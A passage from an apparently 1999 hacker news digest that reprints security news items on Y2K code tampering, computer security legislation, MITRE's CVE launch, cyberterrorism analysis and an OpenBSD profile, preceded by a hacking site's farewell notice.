Darktide.Com right now (but not limited to), minus the text files on hacking. You have my
word. We will continue to open the doors to information.
You, the hackers, made me. Without you, there would be no Darktide Hacking. I owe it all to
you. I just want you all to know that I will never forget the underground, and never leave the
underground behind. I hope to still see a link to Darktide on your pages, and I hope that you will
not forget about me and my crew.
What is money? Money is the root of all evil. We must handle it with care, or we will be the
next AntiOnline. What is life? Live is like a big obstacle. Every time you think your problems
might be gone, they will come right back at you. I hope that you all will make hacking your
problemless life whenever you can. I know I will, till my life ends.
I will miss it,
-Outkast (Founder of Darktide, Inc.)
More Information:
Closing time: Closed.
New site opening time: Date not known yet. We will post the opening date when we have one.
Contact
We have been getting alot of questions sent to our contact@darktide.com E-mail box. Because
Darktide will soon be moving to a diffrent server, that E-mail address might be down for a few days in
this upcoming week so we would like you to send questions to another address. If you would like to
contact us please use this E-mail address. darktide@interaccess.com
Or you can send us mail at:
Darktide
P.O. Box 465
Lake Forest, IL
60045
@HWA
30.0 NIPC Head Warns of Y2K Bug Fixes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by mmullin3
Michael Vatis, who heads the interagency National
Infrastructure Protection Center, has said that they
have found indications that malicious code was being
installed at the same time as Y2K fixes. The finger was
pointed at fixes done by programmers from India and
Israel as well as Ireland, Pakistan and the Philippines.
Exactly what indications where found is not made clear.
It would seem that the severity of this problem isn't
really known and that a lot of people just seem to be
guessing.
MSNBC
http://www.msnbc.com/news/317848.asp
Cyber cop warns of Y2K tampering
Evidence seen that contractors are making malicious changes
under the guise of Year 2000 repairs
REUTERS
WASHINGTON, Sept. 30 Malicious changes to
computer code under the guise of Year 2000
software fixes has begun to surface in some U.S.
work undertaken by foreign contractors, the top
U.S. cyber cop said on Thursday
WE HAVE SOME INDICATIONS that this is
happening in a possible foreshadowing of economic and
security headaches stemming from Y2K fixes, Michael Vatis
of the Federal Bureau of Investigation told Reuters.
Vatis heads the interagency National Infrastructure
Protection Center (NPIC), responsible for detecting and
deterring cyber attacks on networks that drive U.S. finance,
transport, telecommunications and other vital sectors.
A Central Intelligence Agency officer assigned to the
NIPC said recently that India and Israel appeared to be the
most likely sources of malicious remediation of U.S.
software.
India and Israel appear to be the countries whose
governments or industry may most likely use their access to
implant malicious code in light of their assessed motive,
opportunity and means, the CIA officer, Terrill Maynard,
wrote in the June issue of Infrastructure Protection Digest.
Beware the millennium bug repair
Significant amounts of Y2K repair is also being done for
U.S. companies by contractors in Ireland, Pakistan and the
Philippines, according to Maynard.
But they appear among the least likely providers to
jeopardize U.S. corporate or government system integrity,
although the possibility cannot be ruled out, he wrote.
Thousands of companies in the United States and
elsewhere have contracted out system upgrades to cope with
the Y2K glitch, which could scramble computers starting Jan.
1 when 1999 gives way to 2000.
The CIA declined comment on Maynards article.
Referring to it, Vatis said: This is our effort to put out in the
public information that hopefully can be useful to people.
Vatis, interviewed in his 11th floor office at FBI
headquarters, said that so far not a great deal of
Y2K-related tampering had turned up. But thats largely
because, number one, were really dependent on private
companies to tell us if theyre seeing malicious code being
implanted in their systems, he said.
In reporting evidence of possible Y2K-related sabotage
of software, Vatis confirmed one of the worst long-term
fears of U.S. national security planners.
A tremendous amount of remediation of software has
been done overseas or by foreign companies operating within
the United States, Vatis said.
He said it was quite easy for an outsider to code in
ways of gaining future access or causing something to
detonate down the road.
This could expose a company to future denial of service
attacks, open it to economic espionage or leave it vulnerable
to malicious altering of data, Vatis said.
The Special Senate Y2K committee, in its final report
last week, described the issue as an unsettling.
The effort to fix the code may well introduce serious
long-term risks to the nations security and information
superiority, said the panel headed by Robert Bennett,
Republican of Utah, and Chris Dodd, Democrat of
Connecticut.
The panel said the long-term consequences could
include:
Increased foreign intelligence collection
Increase espionage activity
Reduced information security
Loss of economic advantage
Increase in infrastructure vulnerability
Vatis, in testimony before the Y2K panel in July, warned
that contractors could compromise systems by installing trap
doors for anonymous access.
By implanting malicious code, he said, a contractor could
stitch in a logic bomb or a time-delayed virus that would
later disrupt operations. Another threat was insertion of a
program that would compromise passwords or other system
security, he said.
© 1999 Reuters Limited. All rights reserved.
Republication or redistribution of Reuters content is
expressly prohibited without the prior written consent of
Reuters.
@HWA
31.0 Better Computer Security Needs More Than Just Laws
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Code Kid
In testimony before a Congressional Committee
yesterday federal and industry experts said that while
enhancements to twelve year old Computer Security
Act are needed laws alone are not going to fix
underlying security issues on the internet. Increasing
the role of the National Institute of Standards and
Technology to establish security guidelines for federal
agencies would be one of the goals of the Computer
Security Enhancement Act of 1999.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0927/web-security-9-30-99.html
SEPTEMBER 30, 1999 . . . 17:18 EDT
Law is only part of better computer security,
Congress told
BY DIANE FRANK (diane_frank@fcw.com)
Federal agencies would benefit greatly from a proposed enhancement to a
12-year-old computer security law, but legislation alone cannot solve some
underlying information security problems, federal and industry experts told
Congress today.
The Computer Security Enhancement Act of 1999 would increase the role and
resources of the National Institute of Standards and Technology by establishing
security guidelines that federal agencies could follow.
The bill would beef up the Computer Security Act, which requires civilian
agencies to protect computer systems. The Computer Security Enhancement
Act passed the House last year but failed to move in the Senate.
The bill will not necessarily make federal computers safer, said Raymond
Kammer, director of NIST. Agencies must understand that the responsibility for
securing computers and transactions starts with agencies and that they must put
in place steps to meet those demands, he said.
"Only they can decide how valuable the data is and then how to protect it,"
Kammer said. The act also would provide additional resources to NIST for
funding security scholarships and internships for students, part of a solution to
the growing shortage of security professionals within government and industry.
"You can't help [ease] this [IT worker shortage] by bringing in immigrants," said
Harris Miller, president of the Information Technology Association of America.
"You can't outsource this to another country. We need to have specialists in this
country."
@HWA
32.0 New NT Security List Started
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
A new mailing list devoted to NT Security that promises
to be completely full disclosure has been started. The
new list, NT Security Advice, will be moderated by
Steve Manzuik and is open to to anyone interested in,
or working with Microsoft Windows NT and Security.
TO SUBSCRIBE: Send an email to
maillist@ntsecadvice.com
@HWA
33.0 Computer Security Dictionary Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by no0ne
MITRE Corporation has recently unveiled the first Public
Dictionary of Computer Vulnerabilities, "in order to boost
cyber-defense". "Common Vulnerabilities and Exposures
[CVE]" contains standardized names and descriptions of
more than 300 known security vulnerabilities and
exposures, enabling sharing of data among various
vulnerability databases and security tools easier.
Computer World
http://www.computerworld.com/home/news.nsf/all/9909293cved
Mitre unveils security 'dictionary'
By Kathleen Ohlson
In an effort to find common ground for different vulnerability
databases and security tools, the Mitre Corp. today rolled
out its Common Vulnerabilities and Exposures (CVE) effort.
The CVE is a public dictionary that consists of standard
names and descriptions for more than 300 security
vulnerabilities and exposures. Common names will allow
data to cross separate databases and tools, officials said.
Based in Bedford, Mass., Mitre is an independent, nonprofit
company offering technical support to the government. It
developed the list with 19 security organizations, including
Cisco Systems Inc., Internet Security Systems and the
CERT Coordination Center at Carnegie Mellon University,
that make up the CVE Editorial Board.
Related story:
Mitre to announce security 'dictionary', Sept. 28, 1999
http://www.computerworld.com/home/news.nsf/all/9909282mitre
@HWA
34.0 CyberWarfare - Real or Imagined?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Lady Sharrow
An interesting article from the free section of Janes
Intelligence Monthly. This is a quite long article but it
covers the use of Hi-Tech weapons by terrorist
organizations. Most of the article is concerned with
'conventional weapons' i.e. chemical, biological, nuclear
etc but the basic assumptions are also applied to cyber
warfare. This is talking about 'serious' use of these
weapons rather than the average web page
defacement.
Janes Intelligence Monthly
http://jir.janes.com/sample/jir0499.html
Document created: 21 SEPTEMBER 1999
Cyberwarfare: fact or fiction?
Now that cyberwarfare has become an accepted fact, Joshua Sinai examines the
requirements for anti-state groups to employ this and chemical, biological,
radiological and nuclear weaponry.
As the 21st century approaches, there is great concern in worldwide national
security circles about preparations by terrorist groups, either on their own or
jointly with state sponsors, to exploit the increasing availability of sophisticated
lethal technologies to launch mass destruction and mass disruption warfare
against their enemies' populations and critical infrastructures. Mass destruction
warfare utilises chemical, biological, radiological and nuclear (CBRN) weaponry,
whereas cyber terrorism utilizes information technology (IT) devices to inflict
mass disruption of an opponent's critical IT infrastructure. The concern about the
likelihood of CBRN/Cyber terrorist attacks is driven by the emergence of new
types of terrorist groups which possess the motivation and technical capability to
launch such attacks, and particularly a power drive by their leaders to propel their
groups on the international arena as a first order of magnitude technological
destroyer and menace.
Only a select number of terrorist groups and few state sponsors are likely to
possess the necessary motivation and capability in the spheres of organisation,
funding, acquisition, technology, storage and stockpiling, logistics, and other
overt and covert resources to be able to make the transition from conventional to
CBRN/Cyber warfare. For many, the numerous internal and external tasks and
hurdles involved in acquiring, storing and deploying such sophisticated weaponry
and devices are simply too much. Moreover, few terrorist groups and state
sponsors are sufficiently motivated to carry out mass casualty or mass disruption
warfare. For many, small scale conventional attacks such as car or truck
bombings cause sufficient death and destruction to achieve the objective of
terrorising a targeted population and its government in order to compel them to
pay attention or make concessions to an insurgent's cause and grievances.
Nevertheless, there is sufficient reporting of activities by terrorist groups and their
state sponsors in the CBRN/Cyber realm to provide the necessary indications
and warning (I&W) indicators to usher in a new paradigm of super, ultra, and
macro-type catastrophic terrorism. For terrorists, CBRN/Cyber weapons provide
the opportunity to cause death and disruption at unprecedented levels - resulting
in thousands of casualties and billions of dollars in damages to critical
infrastructure nodes. However, depending on the levels of sophisticated
technologies deployed, acquiring a CBRN/Cyber capability requires extensive
funding, an overt or covert acquisition capability, a technological research and
development program to produce, weaponise and stockpile CBRN materiel (or the
capability to purchase or steal ready-made weapons), and a level of technical
expertise and logistical infrastructure that is appropriate to launch successful
CBRN attacks. This is beyond the technical capability or motivation of most
terrorist groups.
On the other hand, the information revolution ushered in by the Internet allows
terrorists to access articles and documents from the World Wide Web about the
manufacture or acquisition of BW or CW agents, and commercial-off-the-shelf
(COTS) software products can easily be obtained to conduct cyberterrorism,
making CB/Cyber attacks much more feasible to launch than hitherto.
Radiological and nuclear weapons, however, are far more difficult for
terrorist
groups to acquire or to develop indigenously, to weaponise and deploy, or to
provide storage for.
Although such cost/benefit considerations may limit the majority of terrorist
operations to the realm of conventional warfare in the 21st century, recent WMD-
related events and reports indicate increasing activity by certain terrorist groups
and state sponsors in the CBRN/Cyber arena. This has been accompanied by a
lowering of the threshold for their conviction that conventional attacks are
insufficiently effective and that a more lethal form of mass casualty or mass
disruption violence is required to achieve their goals.
Thus, the primary differences between conventional and CBRN/Cyber terrorism lie
in the areas of motivation, organisation, funding, and capability in the realms of
acquisition, technology, and logistics. There is also the issue of the capability to
overcome external hurdles. These include acquisition of the necessary
technologies, cooperation by foreign suppliers, creation of a logistics network for
acquisition and deployment, obtaining state sponsorship, and also detection,
penetration, and deterrence by foreign intelligence and counterterrorism
agencies.
There have already been several instances of CBRN/Cyber operations by terrorist
groups. Chemical attacks have been mounted by the Aum Shinrikyo cult, such
as the March 1995 sarin nerve gas attack on the Tokyo subway system, killing
12 people and injuring 5,500. Chemical cyanide was included with explosives in
the February 1993 bombing attack by Islamic militants of the World Trade
Center. In the mid-1980s, the Tamil secessionist group, LTTE (which provides its
operatives with a cyanide pill in the event of capture) threatened to carry out a
BW attack by spreading pathogens to infect humans and crops in Sri Lanka.
Aum Shinrikyo also attempted, albeit unsuccessfully, on at least 10 occasions to
disperse biological warfare agents in aerosol form, and in October 1992 its
members attempted to acquire Ebola virus samples in then Zaire for future use in
biological attacks. In mid-1997, an American white supremacist faction plotted to
attack the New York City subway system with biological weapons. Reportedly,
Hizbullah and Hamas operatives have acquired chemical and biological
components, although they have so far refrained from carrying out such attacks.
Until its top leaders were arrested, some members of the Aum group also studied
uranium enrichment and laser technology which are necessary for acquiring the
capability to develop nuclear weapons. The group had one or possibly more of its
followers on the staff of the Russian Kurchatov Institute's nuclear physics
laboratory. In September 1998, Mamdouh Mahmud Salim, a top aide to Osama
Bin Laden was arrested in Munich while trying to procure enriched uranium for
developing nuclear weapons.
One of the first known instances of cyberterrorism occurred in 1997 when the
LTTE launched cyber attacks against Sri Lankan government sites, including
hacking into a government web site and altering it to transmit their own political
propaganda. Supporters of the Mexican Zapatista rebels have jammed Mexican
government web sites. The American terrorist group, the Christian Patriot
movement, is active in the Internet.??? The Osama Bin Laden group utilises an
extensive network of computers, disks for data storage, and Internet for e-mail
and electronic bulletin boards to exchange information. Hamas operatives in the
Middle East and elsewhere use Internet chat rooms and e-mail to coordinate
activities and plan operations. Other Middle Eastern terrorist groups, such as
Lebanon's Hizbullah and Algeria's Armed Islamic Group, also utilise computers
and the Internet for communications and propaganda.
Terrorists have also targeted critical infrastructure. Thus, for example, in the
Summer of 1998, the LTTE bombed state-owned and private telecommunications
facilities in Sri Lanka, damaging buildings and disrupting telephone service.
Motivation
Motivation concerns the psychological, political and strategic factors that are
likely to serve as incentives or disincentives for terrorist groups to resort to
CBRN/Cyber warfare, particularly the decision to embark on a higher lethality and
disruption in targeting. Motivations are an important factor because they influence
a group's destructive or disruptive potential and the paths and links that they are
likely to pursue to acquire the necessary technological and operational
capabilities to launch CBRN/Cyber attacks. It is important to assess these
motivations because a misunderstanding of a terrorist group's decision making
regarding CBRN/Cyber warfare could lead to underestimating or overestimating a
group's CBRN/Cyber capability, surprises about unanticipated attacks, the types
of weapons chosen, the timeframe for such attacks, and likely targets.
The psychological factors that are likely to drive terrorist groups to embark on
CBRN/Cyber warfare might be irrationally or rationally based. Thus, irrational
factors might be characterised as leadership by extremist, paranoid or criminally
insane border-line personalities, who are driven by a suicidal 'culture of death'. On
the other hand, rationally-based factors would include a need for the great
prestige and power that such weapons would provide or the pursuit of
mass-casualty type vengeance against particularly repressive government
policies or excessively harsh government retaliation. Both types of psychological
actors tend to be authoritarian, and, although the latter type might behave like
rational actors, both types reject commonly accepted societal norms, standards
or proportions that would make them less inclined to exceed a certain violence
and mass casualty threshold, and thus they would be more prone to commit
catastrophic violence and disruption.
The political factors that would motivate terrorist groups to resort to catastrophic
warfare range from particular to broad grievances against a perceived enemy
state, sub-state actors or transnational organisations, and their objectives vary
from revolution, secession for a religious, ethnic or national community, to
nihilism and the complete destruction of a state. A second set of political factors
that are particularly susceptible to a lack of conventional constraints on
catastrophic violence are religious beliefs that advocate visions of apocalyptic
millennialism, messianic apocalypse or redemptiveness, in which CBRN/Cyber
type violence is employed to hasten in a new millenium, the arrival of a messiah,
or a new order. This is particularly the case with messianic groups such as Aum
Shinrikyo which view the society that they seek to destroy as inherently
worthless and offer their adherents a path to a higher existence through rebirth in
the next life. A third set of political factors includes virulent racist or ethnic
hatreds by terrorist groups resolution of which they believe would be achieved by
the destruction or annihilation of the enemy community.
Strategy vis-à-vis CBRN/Cyber warfare concerns how a terrorist group's
leadership defines its broad objectives and the means and targets necessary for
their attainment. For example, a terrorist group that is inclined towards a strategy
of minimising risk or failure, of using violence to influence, but not destroy an
opponent, is concerned about backlash within its own community or intended
audience, and fears massive military retaliation by a foreign state against its own
group and supporting community, might be more likely to adopt tactics that call
for conventional warfare, whereas a group whose strategy is unconstrained by
these factors might be more likely to pursue the CBRN/Cyber catastrophic
option. Thus, an extremist religious terrorist group that regards violence as a
sacramental act or divine duty, and the constituency of which is limited to its own
group, would likely be unconstrained to employ the most lethal violent means at
its disposal. A further strategic objective might be to carry out or threaten to carry
out a CBRN/Cyber attack in order to perpetrate an economic extortion or to
massively damage a critical infrastructure node, such as a food supply. Another
strategic consideration concerns the decision whether or not to seek state
sponsorship and assistance in CBRN/Cyber warfare. A final consideration is
whether the group needs to claim credit for a CBRN/Cyber attack. In fact, the
reduced need to claim credit for such attacks signals the emergence of the
"silent terrorists," and is another factor contributing to loosening self-imposed
constraints against higher levels of lethality.
Organization
There are no fixed organisational prerequisites for attaining CBRN/Cyber
capability, particularly in the age of the Internet when terrorist operatives can be
dispersed geographically yet are able to communicate with each other by using
their own secured communications networks. At one end of the organisational
spectrum, the technological complexities involved in acquiring CBRN/Cyber
capability require a well organised, hierarchical organisation, with a command
and control apparatus staffed by professional terrorists, a highly- developed R&D
apparatus staffed by scientists and technicians, production and storage facilities,
a transnational logistics network to clandestinely acquire the necessary
technology from external sources, and business activities (either legitimate or
illegitimate) to generate the necessary income to fund the acquisition of
CBRN/Cyber operational capability.
At the other end of the organisational spectrum, a CBRN/Cyber operational
capability might be acquired by a terrorist entity of a transitory, ad hoc
amalgamation that bands together for a single mission, that is less cohesive and
more diffuse organizationally, and is staffed by a small number of professional
operatives and amateur associates. In addition, such groups, such as the Osama
Bin Laden network, do not generally operate out of geographically bound
sanctuaries or safe-havens and their activities are not confined to specific
operational areas, but are dispersed worldwide. The use of amateurs by
professional terrorists is significant because these can be used as pawns, cut-
outs or expendable minions to conceal the identity of the particular organisation
or state sponsor that actually orders or commissions a CBRN/Cyber attack. In
such a case, CBRN/Cyber warfare would be carried out by an organizationally ad
hoc terrorist entity, backed by a state sponsor, that joins forces for a specific
one-time operation.
A related organisational issue is the degree of technical and military
professionalization required by terrorist groups to conduct CBRN/Cyber warfare,
or whether amateurs can develop such capability, particularly when aided by a
state sponsor. Thus, to pursue the CBRN/Cyber warfare option, do terrorist
groups need to recruit individuals with technical degrees and expertise in
disciplines such as chemistry, biology, physics, engineering and computer
science? Moreover, does a group need to organise the training on its own or is a
state sponsor required to provide instruction and facilities?
A terrorist group might also train its members in not just a single weapon but a
variety of CBRN/Cyber weapons for which different sets and levels of
technological expertise are required in order to attain operational capability in
each of these weapons. Thus, for example, terrorist groups, such as Aum
Shinrikyo, have provided their members with extensive training and education in a
variety of CBRN/Cyber weapons, including studying uranium enrichment and
laser technology, with at least one of their members working on the staff of a
Russian nuclear physics laboratory, while another contingent traveled to Africa to
study the Ebola virus. Cyberwarfare involves a different set of training
requirements that is also more readily available. Thus, training in computer
science is now widely prevalent among terrorist groups.
Funding
Significant financial resources are required for terrorist groups to develop an
indigenous CBRN/Cyber operational capability unless a group succeeds in
weaponising a crude, low-technology device, or stealing or hijacking such a
device. In general, a range of costs are involved in acquiring, operationalizing,
stockpiling and deploying CBRN/Cyber weapons of varying levels of
sophistication and lethality. As a result, financial considerations play a role in
deciding whether a group will choose single or multiple CBRN/Cyber weapons,
the types of dispersal systems, and whether these weapons will be indigenously
developed, obtained from an external source (whether legally or through
smuggling, hijacking or theft), or are provided by a state sponsor. CBRN/Cyber
weapons for use in terrorist attacks vary greatly in their cost. For example,
acquiring production and operational capability to deploy chemical, biological,
radiological, or cyber capability involves relatively small financial resources, and
are within the means of many terrorist groups. Far more significant financial
resources, which only a few groups possess, are necessary to acquire a nuclear
weapons capability. Nevertheless, some terrorist groups, such as the Aum
Shinrikyo in its heyday, the Bin Laden network, or Colombian narco-traffickers,
could, potentially, acquire a miniaturized nuclear weapon because of the vast
financial resources accruing from their multiplicity of legitimate and criminal
business enterprises. To launch a cyber attack, a terrorist group could purchase
relatively inexpensive commercial-off-the-shelf (COTS) software and hardware,
with some weapons of mass disruption software available on hacker bulletin
boards and Web sites.
State Sponsors
Obtaining the sponsorship of a state with WMD resources can be a major
facilitator in transitioning to CBRN/Cyber terrorism. There are a number of
motivations, requirements, and bureaucratic considerations involved in the
relationship between terrorist groups and potential state sponsors regarding the
resort to CBRN/Cyber warfare. However, obtaining the support of a state sponsor
is not automatic or inevitable. Potential state sponsors would have to weigh the
costs and benefits involved in sponsoring CBRN/Cyber operations by terrorist
groups, including providing assistance in the phases of research, development,
production, and operations planning. Other issues concern the conditions and
arrangements for providing the terrorist group with CBRN/Cyber weapons,
training, logistics, diplomatic cover and deniability.
Thus, a number of cost/benefit factors are involved in the relations between state
sponsors and surrogate terrorist groups. For both there are advantages and
disadvantages. For terrorist groups state sponsorship can provide assistance in
terms of funding, intelligence, CBRN/Cyber weaponry, technical expertise,
training, laboratories, logistics, target reconnaissance and surveillance, escape
assistance and safe haven, diplomatic cover, and deniability. Thus, for example,
attaining the support of a state sponsor with nuclear capability (such as Iran,
Iraq, Pakistan or North Korea) would shortcut the process of fabricating a
high-grade nuclear bomb with weapons-grade material, which would be extremely
difficult, although not impossible, for most terrorist groups to develop on their
own. Such a nuclear weapon, however, would likely be miniaturised and of a
tactical, not a strategic variety.
State support need not be explicit or direct. Thus, a state sponsor might
indirectly influence or remotely control a terrorist group's actions. A state sponsor
might use amateur terrorists as dupes or cut-outs to conceal their involvement,
and thus avoid the possibility of retaliation.
External Hurdles
There are a number of external hurdles that terrorist groups must overcome in
order to acquire operational CBRN/Cyber capability. These hurdles include
technological and logistical factors, obtaining state sponsorship and deterrence
by foreign intelligence and counterterrorism agencies.
In terms of technological hurdles, CBRN weapons and Cyber devices vary in the
levels of technological sophistication required for their development,
weaponization and deployment. There is also a clear distinction between CBRN
weapons and Cyber devices.
Cyberterror devices involve high end technologies, although of a different
magnitude than CBRN weapons, because, among other factors, the means
required to access and achieve the massive destruction or breakdown of a critical
infrastructural information technology (IT)-type target involve entirely different
kinds of delivery systems (eg computers).
CBRN weapons are generally at the high end of the technological spectrum,
although within this high end range there are gradations of technological
sophistication that terrorists are likely to utilise because of the variances in their
own operational capabilities. In general, the ranking of CBRN weapons involves
consideration of the levels of technological sophistication required to develop a
particular CBRN weapon and the potential weapon effects. Thus, if potential
weapon effects are being ranked, chemical devices would be placed at the low
end with tactical nuclear and biological weapons at the high end. On the other
hand, in terms of levels of sophistication required to develop CBRN weapons, the
ranking would begin with the lower end chemical and biological to the higher end
radiological and nuclear. The reason for this ranking is the relative ease with
which it is possible to construct crude chemical and biological devices. Weapons
grade biological agents from a producer-country such as Russia are also
particularly vulnerable to theft or smuggling. Radiological and tactical nuclear
weapons are harder to develop, although crude approximations of them are
feasible for some terrorist groups.
Among CBRN weapons, the most substantial hurdles lie in the fabrication and
deployment of nuclear weapons. There are enormous technological tasks involved
in acquiring and utilising weapons grade materials, such as highly enriched
uranium or plutonium, to produce nuclear explosives. Other than the hurdle of
indigenously producing a nuclear device, terrorist groups would have either to
purchase such a device from external sources, to obtain it from a state sponsor,
or to steal or smuggle it. Tactical nuclear weapons, as opposed to strategic
nuclear weapons, are most vulnerable to theft or illegal purchase by terrorist
groups because of their relatively small size, widespread dispersal, and the
absence among older generations of these weapons of effective electronic locks
or Permissive Action Links (PALs) to prevent their unauthorized use. There are
also complex technical requirements involved in deploying a nuclear explosive
device, particularly in dispersing radioactive material.
In all these cases of CBRN weapons, it may not be necessary for terrorist groups
to acquire actual battlefield weapons-certain crude devices or delivery and
dispersal systems may not achieve mass destruction effects, but might be
sufficient to inflict mass terror.
The logistics hurdle involves the capability by terrorist groups to create an
organizational apparatus and transnational network not only to acquire the
technology to produce CBRN/Cyber weapons and devices, but to conduct target
reconnaissance and surveillance, and then to transport, deliver, disperse and
disseminate the weapon against the intended target and, if possible, carry out an
escape.
Obtaining state support represents another external hurdle. A state sponsor
might be reluctant to collaborate with a terrorist group in the CBRN/Cyber warfare
realm because of the enormous political costs and risks of retaliation and
exposure. Moreover, there is always the possibility that a terrorist group might
prove unreliable or inefficient, or, in a worst case scenario, use CBRN/ Cyber
weapons against their sponsor. On the other hand, there are certain factors,
conditions and circumstances that are likely to facilitate cooperation and joint
ventures between state sponsors and terrorist groups. Thus, for example, using a
surrogate group could enable a state sponsor to achieve certain strategic
objectives while denying its role in such an attack.
Several trends and developments are creating a new dynamic in the relationship
between state sponsors and terrorist groups. In certain CBRN/Cyber areas,
terrorist groups are less dependent on state sponsors because of widespread
access to the Internet and other resources that make it relatively easy for
terrorist groups to learn how to develop chemical or biological agents
indigenously. Similarly, in terms of cyberwarfare, terrorist groups may have little
need for state sponsors because much of the applicable software and hardware
are available commercially and targeting can be accomplished from a computer
terminal hundreds of miles away from the intended targets.
Terrorist groups are extremely vulnerable to deterrence by foreign intelligence and
counterterrorism agencies. Thus, terrorist groups must overcome the continual
possibility of their activities and operations being detected, monitored, penetrated
and potentially preempted, interdicted or destroyed by these agencies.
Conclusion
CBRN/Cyber terrorist warfare is likely to pose a significant threat in the 21st
century as a result of the confluence of motivation, technical capabilities, and
involvement by state sponsors. This analysis is intended to highlight some of the
internal and external factors, requirements and hurdles that need to be
considered in assessing a terrorist group's current and future development status
and operational capability to conduct CBRN/Cyber warfare. Correlating these
internal and external factors and hurdles would make it possible to forecast which
terrorist groups and state sponsors are likely to embark on CBRN/ Cyber warfare,
the types of adaptations and changes they would require to transition to such
warfare, the types of weapons and targeting they are likely to pursue (including
the possible resort to single or multiple CBRN/Cyber weapons and devices), the
timelines for such attacks, and vulnerabilities that could be exploited by foreign
intelligence and counterterrorism agencies to constrain terrorist groups--and,
when applicable, state sponsors--from embarking on such warfare.
@HWA
35.0 Theo de Raadt and OpenBSD Profiled
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
The Calgary Herald has published a profile of Theo de
Raadt and arguably the most secure out of the box
operating system there is, OpenBSD.
Calgary Herald
http://www.calgaryherald.com/business/technology/stories/990930/2929913.html
Calgarian heads team ensuring OpenBSD security
Theo de Raadt oversees hundreds of volunteer programmers
Matthew McClearn, Calgary Herald
With nearly two dozen computers scattered
throughout his Ramsay district home, Theo de
Raadt is well equipped to lead an international
software project.
De Raadt has been working for three years on
OpenBSD, a variant of the Unix operating system.
Unix, favoured by academics, researchers
and systems administrators for its power and flexibility,
is the foundation for many popular operating systems,
including Sun, Solaris and Linux.
What Linus Torvalds is to the increasingly popular
Linux, de Raadt is to OpenBSD. He oversees
hundreds of volunteer programmers who pore over OpenBSD's code trying to
make it better, for little more than glory and the satisfaction of making
software better.
Unlike any other operating system, OpenBSD is engineered from the ground
up with security in mind.
"It's just a really cool process to be involved with," he says. "In two and a
half years, we haven't found a vulnerability. That means in the first six
months, we managed to get rid of them all."
That's in stark contrast to other operating systems, most notably
Microsoft's ubiquitous Windows platform. Windows security flaws are
discovered on a weekly basis.
In the early days of Unix, the University of California at Berkeley wanted to
create its own strengthened version. Academics developed Net2, and
attained a Berkeley Software Distribution (BSD) licence for it -- meaning, in
short, that developers can modify it and users can install it freely at no cost.
The university eventually abandoned Net2 because of legal difficulties, but
by then it had developed a considerable following. It spun off FreeBSD and
NetBSD, two free operating systems.
De Raadt was a founder of the NetBSD and worked on it for three years
before splitting off following a bitter dispute. In 1996, his computer was
cracked by a friend. After hacking into each other's systems several times,
the two began reviewing BSD's 350 megabytes of code looking for security
holes.
The task proved daunting. The harder they looked, the more problems they
discovered. More and more people pored over the body of code, corrected
problems and submitted the improvements to de Raadt and his inner circle.
That code became OpenBSD.
Three years later, de Raadt is still doing it. So far, he has spent $76,000 of
his own money and dedicated many long days.
A new version of OpenBSD comes out every six months. It can be
downloaded for free at www.openbsd.org or purchased on CD-ROM for $30
US.
"I was eating Ichiban and Kraft Dinner because I was too poor to feed
myself," he recalls. "Then we started selling CDs, and now things are OK."
OpenBSD is sold to the world from Calgary. Louis Bertrand, an engineer
who contributes to OpenBSD, explains that it couldn't be shipped from the
United States because of that country's stringent encryption export laws,
which are designed to keep cryptographic tools out of the hands of criminals
and terrorists.
Canada has no such restrictions. The CD label reads: "Made in Canada --
Land of Free Cryptography."
OpenBSD is earning respect for itself among security-conscious
professionals at banks, research labs, government organizations,
universities and other sites.
Bob Beck, secure systems specialist at the University of Alberta, says it's
used extensively on campus.
"We don't have our OpenBSD machines broken into, and we like that," he
says. "That's mainly due to people in the project going through and
pro-actively auditing the code.
"It seems most vendors -- Sun, HP, Microsoft and others who sell
commercial operating systems -- get their product working and they ship it.
The pressure is to get the product to market fast."
Roy Brander, a research analyst for the City of Calgary's waterworks
division, also admires OpenBSD.
"It's a very solid, stable operating system that doesn't go down," he says. "I
wouldn't accuse other operating systems of being insecure -- OpenBSD can
be made insecure if you're careless and other operating systems can be
made secure if you're extremely careful -- but there's no question that out of
the box, OpenBSD is one of the most secure operating systems you can
get."
Though the server market is beginning to take notice, OpenBSD's user base
is tiny compared even to Linux, which for all its fame accounts for a
minuscule slice of the desktop operating system market -- less than five per
cent. Brander estimates OpenBSD's installations in the tens of thousands.
Consequently, it has a comparatively small body of applications that work
on it and device drivers for hardware can be hard to come by. For that
reason, it's unlikely to crack the desktop market.
De Raadt has earned a reputation for not mincing words. He's openly critical
of the process by which Linux has been developed. He's also unhappy with
developers of commercial software vendors like Microsoft, Sun
Microsystems and Hewlett-Packard, who, he says, take no responsibility
for the numerous security holes in their products.
"They don't care and there's no one to tell them they have to care," he says.
But, he adds, "security is starting to become something that affects the
bottom line" and slowly the industry is being forced to address security
issues.
While de Raadt has his critics, he is also respected for his talent and hard
work. Those qualities would earn him big dollars in the corporate world and
he says he gets an job offer every three days from venture capitalists. He
doesn't take them.
"I'd feel guilty," he says. "I can actually provide something to the community
that they'll use. If I were to work for Sun Microsystems, this wouldn't matter
to their bottom line and I don't think it would see the light of day. I wouldn't
actually be securing people's systems."
Beck adds that even if de Raadt wanted to make it commercial, his fellow
programmers would abandon him. "Going commercial would probably kill it,
in my opinion. There would be much more of a pressure to get it to market
quickly, rather than getting it to market correctly."
Fortunately for OpenBSD, de Raadt says the money can wait.
"If I had a lot of money, what would I do? I'd do this."
@HWA
36.0 SPAM HOUSE
~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Tuesday 5th October 1999 on 1:07 pm CET
"IF YOU'RE LOOKING TO LOSE WEIGHT PERMANENTLY AND YOU DON'T HAVE
TIME TO SEEE AN EXPERT HERE'S THE PERFECT OPPORTUNITY. MY FRIEND
LOSS 40 LBS. READ THIS! [sic]" - spam hit thousands of House of Representatives
